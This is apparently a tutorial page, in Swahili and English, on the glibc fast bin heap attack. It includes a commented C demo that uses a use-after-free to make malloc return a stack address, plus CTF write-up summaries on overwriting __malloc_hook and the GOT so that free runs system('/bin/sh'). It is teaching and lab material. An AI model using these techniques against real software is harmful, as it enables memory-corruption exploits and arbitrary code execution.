Fast Bin Attack

Reading time: 9 minutes

Taarifa za Msingi

Kwa taarifa zaidi kuhusu ni nini fast bin angalia ukurasa huu:

Bins & Memory Allocations

Kwa sababu fast bin ni singly linked list, kuna ulinzi mdogo zaidi kuliko katika bins nyingine na modifying an address in a freed fast bin chunk inatosha ili kuweza allocate later a chunk in any memory address.

Kwa muhtasari:

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

Unaweza kupata mfano kamili katika code iliyofafanuliwa vizuri sana kutoka kwa https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

Mifano

• CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:
• Inawezekana kuallocate chunks, ku-free them, kusoma yaliyomo yao na kuzijaza (kwa overflow vulnerability).
• Consolidate chunk for infoleak: Mbinu hiyo kwa msingi ni kutumia overflow kuunda fake prev_size hivyo chunk moja ya awali inawekwa ndani ya kubwa zaidi, hivyo unapoallocate kubwa yenye chunk nyingine, inawezekana kuchapisha data yake na leak an address ya libc (main_arena+88).
• Overwrite malloc hook: Kwa hili, na kwa kutumia hali ya overlapping iliyotajwa, ilikuwepo uwezekano wa kupata chunks 2 zilizoonyesha kwenye memory ileile. Kwa hivyo, ku-free zote mbili (ukiwa una-free chunk nyingine katikati ili kuepuka protections) kulifanya iwezekane kuwa chunk ileile iko kwenye fast bin mara 2. Kisha, ilikuwa inawezekana kuallocate tena, ku-overwrite address ya next chunk ili ianze kidogo kabla ya __malloc_hook (ili ianze kwenye integer ambayo malloc inadhani ni free size - bypass nyingine), kuallocate tena na kisha kuallocate chunk nyingine ambayo itapokea address kwa malloc hooks. Mwisho, one gadget iliandikwa huko.
• CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:
• Kuna heap overflow na use after free na double free kwa kuwa wakati chunk inapo-free inawezekana kureuse na ku-free pointers tena
• Libc info leak: Free tu baadhi ya chunks na zitapata pointer kwa sehemu ya main arena. Kwa kuwa unaweza reuse freed pointers, soma address hiyo.
• Fast bin attack: Pointer zote za allocations zimetumwa ndani ya array, hivyo tunaweza ku-free jozi ya fast bin chunks na kwenye ya mwisho ku-overwrite address ili ianze kidogo kabla ya array hii ya pointers. Kisha, kuallocate jozi ya chunks za size sawa na tutapata kwanza ile halali na kisha ile fake yenye array ya pointers. Sasa tunaweza ku-overwrite pointers hizi za allocation ili kufanya GOT address ya free ianze kuonyesha system na kisha kuandika "/bin/sh" katika chunk 1 kisha kuita free(chunk1) ambayo badala yake itatekeleza system("/bin/sh").
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html
• Mfano mwingine wa kutumia one byte overflow ku-consolidate chunks katika unsorted bin na kupata libc infoleak na kisha kufanya fast bin attack ku-overwrite malloc hook na address ya one gadget
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html
• Baada ya infoleak kwa kutumia unsorted bin pamoja na UAF ili leak libc address na PIE address, exploit ya CTF hii ilitumia fast bin attack kuallocate chunk mahali ambapo pointers za chunks zilizo under control zilikuwa, hivyo ilikuwa inawezekana ku-overwrite pointers fulani kuandika one gadget katika GOT
• Unaweza kupata Fast Bin attack iliyotumika kupitia unsorted bin attack:
• Kumbuka kuwa kawaida kabla ya kufanya fast bin attacks ni kutumika free-lists kupata leak za libc/heap addresses (wakati zinahitajika).
• Robot Factory. BlackHat MEA CTF 2022
• Tunaweza kuallocate tu chunks za size kubwa kuliko 0x100.
• Overwrite global_max_fast kwa kutumia Unsorted Bin attack (inafanya kazi 1/16 ya muda kutokana na ASLR, kwa sababu tunahitaji kubadilisha 12 bits, lakini lazima tubadilishe 16 bits).
• Fast Bin attack ili ku-modify global array ya chunks. Hii inatoa primitive ya arbitrary read/write, ambayo inaruhusu ku-modify GOT na kuweka function fulani ianze kuonyesha system.

Unsorted Bin Attack